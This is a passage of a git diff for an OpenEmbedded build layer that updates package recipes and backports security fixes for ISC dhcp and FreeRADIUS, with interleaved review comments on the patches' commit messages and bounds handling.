420 files changed, 51633 insertions, 1301 deletions
diff --git a/meta-filesystems/recipes-filesystems/ntfs-3g-ntfsprogs/ntfs-3g-ntfsprogs_2022.5.17.bb b/meta-filesystems/recipes-filesystems/ntfs-3g-ntfsprogs/ntfs-3g-ntfsprogs_2022.10.3.bb index b29716ad49..37a8106bb0 100644 --- a/meta-filesystems/recipes-filesystems/ntfs-3g-ntfsprogs/ntfs-3g-ntfsprogs_2022.5.17.bb +++ b/meta-filesystems/recipes-filesystems/ntfs-3g-ntfsprogs/ntfs-3g-ntfsprogs_2022.10.3.bb @@ -10,7 +10,7 @@ SRC_URI = "http://tuxera.com/opensource/ntfs-3g_ntfsprogs-${PV}.tgz \ file://0001-libntfs-3g-Makefile.am-fix-install-failed-while-host.patch \ " S = "${WORKDIR}/ntfs-3g_ntfsprogs-${PV}" -SRC_URI[sha256sum] = "0489fbb6972581e1b417ab578d543f6ae522e7fa648c3c9b49c789510fd5eb93" +SRC_URI[sha256sum] = "f20e36ee68074b845e3629e6bced4706ad053804cbaf062fbae60738f854170c" UPSTREAM_CHECK_URI = "https://www.tuxera.com/community/open-source-ntfs-3g/" UPSTREAM_CHECK_REGEX = "ntfs-3g_ntfsprogs-(?P<pver>\d+(\.\d+)+)\.tgz" diff --git a/meta-gnome/recipes-connectivity/geary/geary_40.0.bb b/meta-gnome/recipes-connectivity/geary/geary_40.0.bb index 501b27a544..7faa69c55c 100644 --- a/meta-gnome/recipes-connectivity/geary/geary_40.0.bb +++ b/meta-gnome/recipes-connectivity/geary/geary_40.0.bb @@ -33,7 +33,7 @@ RDEPENDS:${PN} = "gnome-keyring" inherit meson pkgconfig mime-xdg gtk-icon-cache gobject-introspection vala features_check SRC_URI = " \ - git://github.com/GNOME/geary.git;nobranch=1;protocol=https \ + git://github.com/GNOME/geary.git;branch=main;protocol=https \ file://0001-Util.Cache.Lru-Workaround-missing-generic-type-argum.patch \ file://0002-Fix-accessibility-issues-with-initializer-of-constan.patch \ " diff --git a/meta-initramfs/recipes-devtools/grubby/grubby_git.bb b/meta-initramfs/recipes-devtools/grubby/grubby_git.bb index a276bf423c..7c40c52cf6 100644 --- a/meta-initramfs/recipes-devtools/grubby/grubby_git.bb +++ b/meta-initramfs/recipes-devtools/grubby/grubby_git.bb 
@@ -14,7 +14,7 @@ DEPENDS:append:libc-musl = " libexecinfo" S = "${WORKDIR}/git" SRCREV = "a1d2ae93408c3408e672d7eba4550fdf27fb0201" -SRC_URI = "git://github.com/rhboot/grubby.git;protocol=https;;branch=master \ +SRC_URI = "git://github.com/rhboot/grubby.git;protocol=https;branch=main \ file://grubby-rename-grub2-editenv-to-grub-editenv.patch \ file://run-ptest \ file://0001-Add-another-variable-LIBS-to-provides-libraries-from.patch \ diff --git a/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb b/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb index 3e43c0d2a7..e7f918333a 100644 --- a/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb +++ b/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb @@ -22,4 +22,4 @@ inherit autotools pkgconfig CFLAGS += " -I${S}" FILES:${PN} += "${datadir}/dbus-1" -FILES:${PN}-dev += "${libdir}/${PN}/*.so" +FILES:${PN}-dev += "${libdir}/${BPN}/*.so" diff --git a/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb b/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb index b25e446c41..071379758c 100644 --- a/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb +++ b/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb @@ -19,4 +19,4 @@ S = "${WORKDIR}/git" inherit autotools pkgconfig FILES:${PN} += "${datadir}/dbus-1" -FILES:${PN}-dev += "${libdir}/${PN}/*.so" +FILES:${PN}-dev += "${libdir}/${BPN}/*.so" diff --git a/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc b/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc index 14d09e5f0b..a4590d61a9 100644 --- a/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc +++ b/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc 
@@ -4,7 +4,7 @@ SECTION = "libs/multimedia" LICENSE = "LGPL-2.1-only" LIC_FILES_CHKSUM = "file://LICENSE;md5=fc178bcd425090939a8b634d1d6a9594" -SRC_URI = "git://github.com/FluidSynth/fluidsynth.git;branch=2.2.x;protocol=https" +SRC_URI = "git://github.com/FluidSynth/fluidsynth.git;branch=master;protocol=https" SRCREV = "8b00644751578ba67b709a827cbe5133d849d339" S = "${WORKDIR}/git" PV = "2.2.6" diff --git a/meta-multimedia/recipes-multimedia/musicpd/mpd_0.23.6.bb b/meta-multimedia/recipes-multimedia/musicpd/mpd_0.23.12.bb index c74f1074cc..13938444c8 100644 --- a/meta-multimedia/recipes-multimedia/musicpd/mpd_0.23.6.bb +++ b/meta-multimedia/recipes-multimedia/musicpd/mpd_0.23.12.bb @@ -21,7 +21,7 @@ DEPENDS += " \ SRC_URI = "git://github.com/MusicPlayerDaemon/MPD;branch=v0.23.x;protocol=https \ file://mpd.conf.in \ " -SRCREV = "f591193ddaa7f9bcb6c85ff5899517fc7b53e35a" +SRCREV = "d91da9679801224847c30147f5914785b6f8f240" S = "${WORKDIR}/git" EXTRA_OEMESON += "${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '-Dsystemd=enabled -Dsystemd_system_unit_dir=${systemd_system_unitdir} -Dsystemd_user_unit_dir=${systemd_system_unitdir}', '-Dsystemd=disabled', d)}" diff --git a/meta-multimedia/recipes-multimedia/musicpd/ncmpc/0001-SearchPage-use-regular-integer-to-fix-Wenum-constexp.patch b/meta-multimedia/recipes-multimedia/musicpd/ncmpc/0001-SearchPage-use-regular-integer-to-fix-Wenum-constexp.patch new file mode 100644 index 0000000000..92094af1f2 --- /dev/null +++ b/meta-multimedia/recipes-multimedia/musicpd/ncmpc/0001-SearchPage-use-regular-integer-to-fix-Wenum-constexp.patch 
@@ -0,0 +1,37 @@ +From 2e8dc2c28c0938dbbb85ebbac2b9a60be9ccd9f3 Mon Sep 17 00:00:00 2001 +From: Max Kellermann <max@musicpd.org> +Date: Wed, 23 Nov 2022 12:25:50 +0100 +Subject: [PATCH] SearchPage: use regular integer to fix -Wenum-constexpr-conversion + +Upstream-Status: Backport [https://github.com/MusicPlayerDaemon/ncmpc/commit/ddd1757907f0376b5843f707bf182b7827ff6591] +--- + src/SearchPage.cxx | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/src/SearchPage.cxx b/src/SearchPage.cxx +index 2fa5edbc..3f91c4fe 100644 +--- a/src/SearchPage.cxx ++++ b/src/SearchPage.cxx +@@ -81,7 +81,7 @@ search_get_tag_id(const char *name) + } + + struct SearchMode { +- enum mpd_tag_type table; ++ int table; + const char *label; + }; + +@@ -89,8 +89,8 @@ static constexpr SearchMode mode[] = { + { MPD_TAG_TITLE, N_("Title") }, + { MPD_TAG_ARTIST, N_("Artist") }, + { MPD_TAG_ALBUM, N_("Album") }, +- { (enum mpd_tag_type)SEARCH_URI, N_("Filename") }, +- { (enum mpd_tag_type)SEARCH_ARTIST_TITLE, N_("Artist + Title") }, ++ { SEARCH_URI, N_("Filename") }, ++ { SEARCH_ARTIST_TITLE, N_("Artist + Title") }, + { MPD_TAG_COUNT, nullptr } + }; + +-- +2.39.0 + diff --git a/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.46.bb b/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.47.bb index a77d4f9783..44046912ed 100644 --- a/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.46.bb +++ b/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.47.bb @@ -34,6 +34,7 @@ PACKAGECONFIG[chat_screen] = "-Dchat_screen=true,-Dchat_screen=false" SRC_URI = " \ git://github.com/MusicPlayerDaemon/ncmpc;branch=master;protocol=https \ + file://0001-SearchPage-use-regular-integer-to-fix-Wenum-constexp.patch \ " -SRCREV = "b9b5e11e10d8f66cd672ffb51728aa447f78ecd4" +SRCREV = "fc8de01c71acdf10ad07c7aae756dc522b848124" S = "${WORKDIR}/git" 
diff --git a/meta-multimedia/recipes-multimedia/packagegroups/packagegroup-meta-multimedia.bb b/meta-multimedia/recipes-multimedia/packagegroups/packagegroup-meta-multimedia.bb index 2b7a43b93d..b0fce73b53 100644 --- a/meta-multimedia/recipes-multimedia/packagegroups/packagegroup-meta-multimedia.bb +++ b/meta-multimedia/recipes-multimedia/packagegroups/packagegroup-meta-multimedia.bb @@ -55,7 +55,7 @@ RDEPENDS:packagegroup-meta-multimedia = "\ tearsofsteel-1080p \ schroedinger \ pipewire \ - ${@bb.utils.contains("LICENSE_FLAGS_ACCEPTED", "commercial", "projucer", "", d)} \ + ${@bb.utils.contains("LICENSE_FLAGS_ACCEPTED", "commercial", bb.utils.contains("DISTRO_FEATURES", "x11", "projucer", "", d), "", d)} \ libcamera \ ${@bb.utils.contains("LICENSE_FLAGS_ACCEPTED", "commercial", "libde265 openh264", "", d)} \ vorbis-tools \ diff --git a/meta-networking/classes/kernel_wireless_regdb.bbclass b/meta-networking/classes/kernel_wireless_regdb.bbclass index 1238172bd4..9ad566c837 100644 --- a/meta-networking/classes/kernel_wireless_regdb.bbclass +++ b/meta-networking/classes/kernel_wireless_regdb.bbclass @@ -17,4 +17,4 @@ do_kernel_add_regdb() { cp ${STAGING_LIBDIR_NATIVE}/crda/db.txt ${S}/net/wireless/db.txt } do_kernel_add_regdb[dirs] = "${S}" -addtask kernel_add_regdb before do_build after do_configure +addtask kernel_add_regdb before do_compile after do_configure diff --git a/meta-networking/licenses/netperf b/meta-networking/licenses/netperf deleted file mode 100644 index 3f3ceb2fc2..0000000000 --- a/meta-networking/licenses/netperf +++ /dev/null 
@@ -1,43 +0,0 @@ - - - Copyright (C) 1993 Hewlett-Packard Company - ALL RIGHTS RESERVED. - - The enclosed software and documentation includes copyrighted works - of Hewlett-Packard Co. For as long as you comply with the following - limitations, you are hereby authorized to (i) use, reproduce, and - modify the software and documentation, and to (ii) distribute the - software and documentation, including modifications, for - non-commercial purposes only. - - 1. The enclosed software and documentation is made available at no - charge in order to advance the general development of - high-performance networking products. - - 2. You may not delete any copyright notices contained in the - software or documentation. All hard copies, and copies in - source code or object code form, of the software or - documentation (including modifications) must contain at least - one of the copyright notices. - - 3. The enclosed software and documentation has not been subjected - to testing and quality control and is not a Hewlett-Packard Co. - product. At a future time, Hewlett-Packard Co. may or may not - offer a version of the software and documentation as a product. - - 4. THE SOFTWARE AND DOCUMENTATION IS PROVIDED "AS IS". - HEWLETT-PACKARD COMPANY DOES NOT WARRANT THAT THE USE, - REPRODUCTION, MODIFICATION OR DISTRIBUTION OF THE SOFTWARE OR - DOCUMENTATION WILL NOT INFRINGE A THIRD PARTY'S INTELLECTUAL - PROPERTY RIGHTS. HP DOES NOT WARRANT THAT THE SOFTWARE OR - DOCUMENTATION IS ERROR FREE. HP DISCLAIMS ALL WARRANTIES, - EXPRESS AND IMPLIED, WITH REGARD TO THE SOFTWARE AND THE - DOCUMENTATION. HP SPECIFICALLY DISCLAIMS ALL WARRANTIES OF - MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. - - 5. HEWLETT-PACKARD COMPANY WILL NOT IN ANY EVENT BE LIABLE FOR ANY - DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES - (INCLUDING LOST PROFITS) RELATED TO ANY USE, REPRODUCTION, - MODIFICATION, OR DISTRIBUTION OF THE SOFTWARE OR DOCUMENTATION. - - 
diff --git a/meta-networking/recipes-connectivity/dhcp/dhcp-relay_4.4.3.bb b/meta-networking/recipes-connectivity/dhcp/dhcp-relay_4.4.3.bb index 92c648708e..499b035040 100644 --- a/meta-networking/recipes-connectivity/dhcp/dhcp-relay_4.4.3.bb +++ b/meta-networking/recipes-connectivity/dhcp/dhcp-relay_4.4.3.bb @@ -17,6 +17,8 @@ SRC_URI = "https://downloads.isc.org/isc/dhcp/${PV}/dhcp-${PV}.tar.gz \ file://0001-Makefile.am-only-build-dhcrelay.patch \ file://0002-bind-Makefile.in-disable-backtrace.patch \ file://0003-bind-Makefile.in-regenerate-configure.patch \ + file://CVE-2022-2928.patch \ + file://CVE-2022-2929.patch \ " SRC_URI[sha256sum] = "0e3ec6b4c2a05ec0148874bcd999a66d05518378d77421f607fb0bc9d0135818" diff --git a/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2928.patch b/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2928.patch new file mode 100644 index 0000000000..247e8dec68 --- /dev/null +++ b/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2928.patch 
@@ -0,0 +1,120 @@ +From 2e08d138ff852820a6e87a09088d2dc2cdd15e56 Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Mon, 10 Oct 2022 09:57:15 +0530 +Subject: [PATCH 1/2] CVE-2022-2928 + +Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/] +CVE: CVE-2022-2928 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + common/options.c | 7 +++++ + common/tests/option_unittest.c | 54 ++++++++++++++++++++++++++++++++++ + 2 files changed, 61 insertions(+) + +diff --git a/common/options.c b/common/options.c +index 92c8fee..f0959cb 100644 +--- a/common/options.c ++++ b/common/options.c +@@ -4452,6 +4452,8 @@ add_option(struct option_state *options, + if (!option_cache_allocate(&oc, MDL)) { + log_error("No memory for option cache adding %s (option %d).", + option->name, option_num); ++ /* Get rid of reference created during hash lookup. */ ++ option_dereference(&option, MDL); + return 0; + } + +@@ -4463,6 +4465,8 @@ add_option(struct option_state *options, + MDL)) { + log_error("No memory for constant data adding %s (option %d).", + option->name, option_num); ++ /* Get rid of reference created during hash lookup. */ ++ option_dereference(&option, MDL); + option_cache_dereference(&oc, MDL); + return 0; + } +@@ -4471,6 +4475,9 @@ add_option(struct option_state *options, + save_option(&dhcp_universe, options, oc); + option_cache_dereference(&oc, MDL); + ++ /* Get rid of reference created during hash lookup. 
*/ ++ option_dereference(&option, MDL); ++ + return 1; + } + +diff --git a/common/tests/option_unittest.c b/common/tests/option_unittest.c +index 600ebe6..963b566 100644 +--- a/common/tests/option_unittest.c ++++ b/common/tests/option_unittest.c +@@ -213,6 +213,59 @@ ATF_TC_BODY(parse_X, tc) + } + } + ++ATF_TC(add_option_ref_cnt); ++ ++ATF_TC_HEAD(add_option_ref_cnt, tc) ++{ ++ atf_tc_set_md_var(tc, "descr", ++ "Verify add_option() does not leak option ref counts."); ++} ++ ++ATF_TC_BODY(add_option_ref_cnt, tc) ++{ ++ struct option_state *options = NULL; ++ struct option *option = NULL; ++ unsigned int cid_code = DHO_DHCP_CLIENT_IDENTIFIER; ++ char *cid_str = "1234"; ++ int refcnt_before = 0; ++ ++ // Look up the option we're going to add. ++ initialize_common_option_spaces(); ++ if (!option_code_hash_lookup(&option, dhcp_universe.code_hash, ++ &cid_code, 0, MDL)) { ++ atf_tc_fail("cannot find option definition?"); ++ } ++ ++ // Get the option's reference count before we call add_options. ++ refcnt_before = option->refcnt; ++ ++ // Allocate a option_state to which to add an option. ++ if (!option_state_allocate(&options, MDL)) { ++ atf_tc_fail("cannot allocat options state"); ++ } ++ ++ // Call add_option() to add the option to the option state. ++ if (!add_option(options, cid_code, cid_str, strlen(cid_str))) { ++ atf_tc_fail("add_option returned 0"); ++ } ++ ++ // Verify that calling add_option() only adds 1 to the option ref count. ++ if (option->refcnt != (refcnt_before + 1)) { ++ atf_tc_fail("after add_option(), count is wrong, before %d, after: %d", ++ refcnt_before, option->refcnt); ++ } ++ ++ // Derefrence the option_state, this should reduce the ref count to ++ // it's starting value. ++ option_state_dereference(&options, MDL); ++ ++ // Verify that dereferencing option_state restores option ref count. 
++ if (option->refcnt != refcnt_before) { ++ atf_tc_fail("after state deref, count is wrong, before %d, after: %d", ++ refcnt_before, option->refcnt); ++ } ++} ++ + /* This macro defines main() method that will call specified + test cases. tp and simple_test_case names can be whatever you want + as long as it is a valid variable identifier. */ +@@ -221,6 +274,7 @@ ATF_TP_ADD_TCS(tp) + ATF_TP_ADD_TC(tp, option_refcnt); + ATF_TP_ADD_TC(tp, pretty_print_option); + ATF_TP_ADD_TC(tp, parse_X); ++ ATF_TP_ADD_TC(tp, add_option_ref_cnt); + + return (atf_no_error()); + } +-- +2.25.1 + diff --git a/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2929.patch b/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2929.patch new file mode 100644 index 0000000000..faaac4868c --- /dev/null +++ b/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2929.patch 
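Review bot: The header of CVE-2022-2928.patch has only the CVE id as its subject, so nothing in the file says what was wrong, and CVE-2022-2929.patch has the same gap. Going by the added comments and the new test, a one-line body such as `add_option() never released the option reference taken by the hash lookup; drop it on every return path` would do here. For the second patch, `fqdn_universe_decode(): leave the label-length error cases through the bad: label instead of returning directly` fits the visible change. What `bad:` cleans up is outside that hunk, so the wording should be confirmed against the full function. The Upstream-Status URL in both headers points at the patch directory rather than the specific file, which makes the backport harder to audit later.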
@@ -0,0 +1,40 @@ +From 5436cafe1d7df409a44ff5f610248db57f0677ee Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Mon, 10 Oct 2022 09:58:04 +0530 +Subject: [PATCH 2/2] CVE-2022-2929 + +Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/] +CVE: CVE-2022-2929 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + common/options.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/common/options.c b/common/options.c +index f0959cb..25450e1 100644 +--- a/common/options.c ++++ b/common/options.c +@@ -454,16 +454,16 @@ int fqdn_universe_decode (struct option_state *options, + while (s < &bp -> data[0] + length + 2) { + len = *s; + if (len > 63) { +- log_info ("fancy bits in fqdn option"); +- return 0; ++ log_info ("label length exceeds 63 in fqdn option"); ++ goto bad; + } + if (len == 0) { + terminated = 1; + break; + } + if (s + len > &bp -> data [0] + length + 3) { +- log_info ("fqdn tag longer than buffer"); +- return 0; ++ log_info ("fqdn label longer than buffer"); ++ goto bad; + } + + if (first_len == 0) { +-- +2.25.1 + diff --git a/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41860.patch b/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41860.patch new file mode 100644 index 0000000000..4ea519c752 --- /dev/null +++ b/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41860.patch 
@@ -0,0 +1,118 @@ +From f1cdbb33ec61c4a64a32e107d4d02f936051c708 Mon Sep 17 00:00:00 2001 +From: "Alan T. DeKok" <aland@freeradius.org> +Date: Mon, 7 Feb 2022 22:26:05 -0500 +Subject: [PATCH] it's probably wrong to be completely retarded. Let's fix + that. + +CVE: CVE-2022-41860 + +Upstream-Status: Backport +[https://github.com/FreeRADIUS/freeradius-server/commit/f1cdbb33ec61c4a64a32e107d4d02f936051c708] + +Signed-off-by: Yi Zhao <yi.zhao@windriver.com> +--- + src/modules/rlm_eap/libeap/eapsimlib.c | 69 +++++++++++++++++++------- + 1 file changed, 52 insertions(+), 17 deletions(-) + +diff --git a/src/modules/rlm_eap/libeap/eapsimlib.c b/src/modules/rlm_eap/libeap/eapsimlib.c +index cf1e8a7dd9..e438a844ea 100644 +--- a/src/modules/rlm_eap/libeap/eapsimlib.c ++++ b/src/modules/rlm_eap/libeap/eapsimlib.c +@@ -307,42 +307,77 @@ int unmap_eapsim_basictypes(RADIUS_PACKET *r, + newvp->vp_length = 1; + fr_pair_add(&(r->vps), newvp); + ++ /* ++ * EAP-SIM has a 1 octet of subtype, and 2 octets ++ * reserved. ++ */ + attr += 3; + attrlen -= 3; + +- /* now, loop processing each attribute that we find */ +- while(attrlen > 0) { ++ /* ++ * Loop over each attribute. The format is: ++ * ++ * 1 octet of type ++ * 1 octet of length (value 1..255) ++ * ((4 * length) - 2) octets of data. ++ */ ++ while (attrlen > 0) { + uint8_t *p; + +- if(attrlen < 2) { ++ if (attrlen < 2) { + fr_strerror_printf("EAP-Sim attribute %d too short: %d < 2", es_attribute_count, attrlen); + return 0; + } + ++ if (!attr[1]) { ++ fr_strerror_printf("EAP-Sim attribute %d (no.%d) has no data", eapsim_attribute, ++ es_attribute_count); ++ return 0; ++ } ++ + eapsim_attribute = attr[0]; + eapsim_len = attr[1] * 4; + ++ /* ++ * The length includes the 2-byte header. 
++ */ + if (eapsim_len > attrlen) { + fr_strerror_printf("EAP-Sim attribute %d (no.%d) has length longer than data (%d > %d)", + eapsim_attribute, es_attribute_count, eapsim_len, attrlen); + return 0; + } + +- if(eapsim_len > MAX_STRING_LEN) { +- eapsim_len = MAX_STRING_LEN; +- } +- if (eapsim_len < 2) { +- fr_strerror_printf("EAP-Sim attribute %d (no.%d) has length too small", eapsim_attribute, +- es_attribute_count); +- return 0; +- } ++ newvp = fr_pair_afrom_num(r, eapsim_attribute + PW_EAP_SIM_BASE, 0); ++ if (!newvp) { ++ /* ++ * RFC 4186 Section 8.1 says 0..127 are ++ * "non-skippable". If one such ++ * attribute is found and we don't ++ * understand it, the server has to send: ++ * ++ * EAP-Request/SIM/Notification packet with an ++ * (AT_NOTIFICATION code, which implies general failure ("General ++ * failure after authentication" (0), or "General failure" (16384), ++ * depending on the phase of the exchange), which terminates the ++ * authentication exchange. ++ */ ++ if (eapsim_attribute <= 127) { ++ fr_strerror_printf("Unknown mandatory attribute %d, failing", ++ eapsim_attribute); ++ return 0; ++ } + +- newvp = fr_pair_afrom_num(r, eapsim_attribute+PW_EAP_SIM_BASE, 0); +- newvp->vp_length = eapsim_len-2; +- newvp->vp_octets = p = talloc_array(newvp, uint8_t, newvp->vp_length); +- memcpy(p, &attr[2], eapsim_len-2); +- fr_pair_add(&(r->vps), newvp); +- newvp = NULL; ++ } else { ++ /* ++ * It's known, ccount for header, and ++ * copy the value over. ++ */ ++ newvp->vp_length = eapsim_len - 2; ++ ++ newvp->vp_octets = p = talloc_array(newvp, uint8_t, newvp->vp_length); ++ memcpy(p, &attr[2], newvp->vp_length); ++ fr_pair_add(&(r->vps), newvp); ++ } + + /* advance pointers, decrement length */ + attr += eapsim_len; +-- +2.25.1 + diff --git a/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41861.patch b/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41861.patch new file mode 100644 index 0000000000..352c02137a --- /dev/null 
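Review bot: In the added `if (!attr[1])` branch the error message formats `eapsim_attribute`, but `eapsim_attribute = attr[0];` only runs after that check. The message therefore names the previous attribute, or whatever the variable held on entry to the loop (its declaration is outside the hunk). Either pass `attr[0]` to `fr_strerror_printf()` in that branch or move the assignment above the check. The text appears to match the upstream commit as backported, so the correction belongs upstream as well. These messages are what an operator reads when triaging malformed EAP-SIM packets, so they should identify the attribute actually being rejected.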
+++ b/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41861.patch @@ -0,0 +1,53 @@ +From 0ec2b39d260e08e4c3464f6b95005821dc559c62 Mon Sep 17 00:00:00 2001 +From: "Alan T. DeKok" <aland@freeradius.org> +Date: Mon, 28 Feb 2022 10:34:15 -0500 +Subject: [PATCH] manual port of commit 5906bfa1 + +CVE: CVE-2022-41861 + +Upstream-Status: Backport +[https://github.com/FreeRADIUS/freeradius-server/commit/0ec2b39d260e08e4c3464f6b95005821dc559c62] + +Signed-off-by: Yi Zhao <yi.zhao@windriver.com> +--- + src/lib/filters.c | 12 +++++++++--- + 1 file changed, 9 insertions(+), 3 deletions(-) + +diff --git a/src/lib/filters.c b/src/lib/filters.c +index 4868cd385d..3f3b63daee 100644 +--- a/src/lib/filters.c ++++ b/src/lib/filters.c +@@ -1205,13 +1205,19 @@ void print_abinary(char *out, size_t outlen, uint8_t const *data, size_t len, in + } + } + } else if (filter->type == RAD_FILTER_GENERIC) { +- int count; ++ size_t count, masklen; ++ ++ masklen = ntohs(filter->u.generic.len); ++ if (masklen >= sizeof(filter->u.generic.mask)) { ++ *p = '\0'; ++ return; ++ } + + i = snprintf(p, outlen, " %u ", (unsigned int) ntohs(filter->u.generic.offset)); + p += i; + + /* show the mask */ +- for (count = 0; count < ntohs(filter->u.generic.len); count++) { ++ for (count = 0; count < masklen; count++) { + i = snprintf(p, outlen, "%02x", filter->u.generic.mask[count]); + p += i; + outlen -= i; +@@ -1222,7 +1228,7 @@ void print_abinary(char *out, size_t outlen, uint8_t const *data, size_t len, in + outlen--; + + /* show the value */ +- for (count = 0; count < ntohs(filter->u.generic.len); count++) { ++ for (count = 0; count < masklen; count++) { + i = snprintf(p, outlen, "%02x", filter->u.generic.value[count]); + p += i; + outlen -= i; +-- +2.25.1 + diff --git a/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.21.bb b/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.21.bb index 1407b798b5..db37f65918 100644 
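Review bot: The new `masklen` check bounds the reads from `filter->u.generic.mask` and `.value`, but the writes in the same branch still trust the return value of `snprintf()`. Each loop does `p += i; outlen -= i;`, and on truncation `i` is the length that would have been written, so `p` can move past the buffer and the `size_t` `outlen` can wrap. In the lines shown, the first `snprintf(p, outlen, " %u ", ...)` of the branch also advances `p` without reducing `outlen`. A guard after each call, for example `if (i < 0 || (size_t) i >= outlen) return;`, would close this. Whether callers always pass a large enough `out` cannot be judged from the hunk, and print_abinary() continues outside it.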
--- a/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.21.bb +++ b/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.21.bb @@ -33,6 +33,8 @@ SRC_URI = "git://github.com/FreeRADIUS/freeradius-server.git;branch=v3.0.x;lfs=0 file://radiusd-volatiles.conf \ file://check-openssl-cmds-in-script-bootstrap.patch \ file://0001-version.c-don-t-print-build-flags.patch \ + file://CVE-2022-41860.patch \ + file://CVE-2022-41861.patch \ " raddbdir="${sysconfdir}/${MLPREFIX}raddb" diff --git a/meta-networking/recipes-connectivity/libdnet/libdnet_1.14.bb b/meta-networking/recipes-connectivity/libdnet/libdnet_1.14.bb index 9f2ff51576..c7cd21b6bf 100644 --- a/meta-networking/recipes-connectivity/libdnet/libdnet_1.14.bb +++ b/meta-networking/recipes-connectivity/libdnet/libdnet_1.14.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=0036c1b155f4e999f3e0a373490b5db9" -SRC_URI = "git://github.com/dugsong/libdnet.git;nobranch=1;protocol=https" +SRC_URI = "git://github.com/dugsong/libdnet.git;branch=master;protocol=https" SRCREV = "3e782472d2a58d5e1b94d04eda4a364c2d257600" UPSTREAM_CHECK_GITTAGREGEX = "libdnet-(?P<pver>\d+(\.\d+)+)" diff --git a/meta-networking/recipes-connectivity/mbedtls/mbedtls/0001-AES-NI-use-target-attributes-for-x86-32-bit-intrinsi.patch b/meta-networking/recipes-connectivity/mbedtls/mbedtls/0001-AES-NI-use-target-attributes-for-x86-32-bit-intrinsi.patch new file mode 100644 index 0000000000..5030fb99f9 --- /dev/null +++ b/meta-networking/recipes-connectivity/mbedtls/mbedtls/0001-AES-NI-use-target-attributes-for-x86-32-bit-intrinsi.patch 
@@ -0,0 +1,87 @@ +From 80d3e73ad0648f558a067a9dbfe3bc80e6b614f8 Mon Sep 17 00:00:00 2001 +From: Beniamin Sandu <beniaminsandu@gmail.com> +Date: Mon, 30 Oct 2023 19:15:56 +0000 +Subject: [PATCH] AES-NI: use target attributes for x86 32-bit intrinsics + +This way we build with 32-bit gcc/clang out of the box. +We also fallback to assembly for 64-bit clang-cl if needed cpu +flags are not provided, instead of throwing an error. + +Upstream-Status: Backport [https://github.com/Mbed-TLS/mbedtls/commit/800f2b7c020678a84abfa9688962b91c36e6693d] + +Signed-off-by: Beniamin Sandu <beniaminsandu@gmail.com> +--- + library/aesni.c | 20 ++++++++++++++++++++ + library/aesni.h | 8 +++++--- + 2 files changed, 25 insertions(+), 3 deletions(-) + +diff --git a/library/aesni.c b/library/aesni.c +index 5f25a8249..481fa3822 100644 +--- a/library/aesni.c ++++ b/library/aesni.c +@@ -41,6 +41,17 @@ + #include <immintrin.h> + #endif + ++#if defined(MBEDTLS_ARCH_IS_X86) ++#if defined(MBEDTLS_COMPILER_IS_GCC) ++#pragma GCC push_options ++#pragma GCC target ("pclmul,sse2,aes") ++#define MBEDTLS_POP_TARGET_PRAGMA ++#elif defined(__clang__) ++#pragma clang attribute push (__attribute__((target("pclmul,sse2,aes"))), apply_to=function) ++#define MBEDTLS_POP_TARGET_PRAGMA ++#endif ++#endif ++ + #if !defined(MBEDTLS_AES_USE_HARDWARE_ONLY) + /* + * AES-NI support detection routine +@@ -396,6 +407,15 @@ static void aesni_setkey_enc_256(unsigned char *rk_bytes, + } + #endif /* !MBEDTLS_AES_ONLY_128_BIT_KEY_LENGTH */ + ++#if defined(MBEDTLS_POP_TARGET_PRAGMA) ++#if defined(__clang__) ++#pragma clang attribute pop ++#elif defined(__GNUC__) ++#pragma GCC pop_options ++#endif ++#undef MBEDTLS_POP_TARGET_PRAGMA ++#endif ++ + #else /* MBEDTLS_AESNI_HAVE_CODE == 1 */ + + #if defined(__has_feature) +diff --git a/library/aesni.h b/library/aesni.h +index ba1429029..37ae02c82 100644 +--- a/library/aesni.h ++++ b/library/aesni.h +@@ 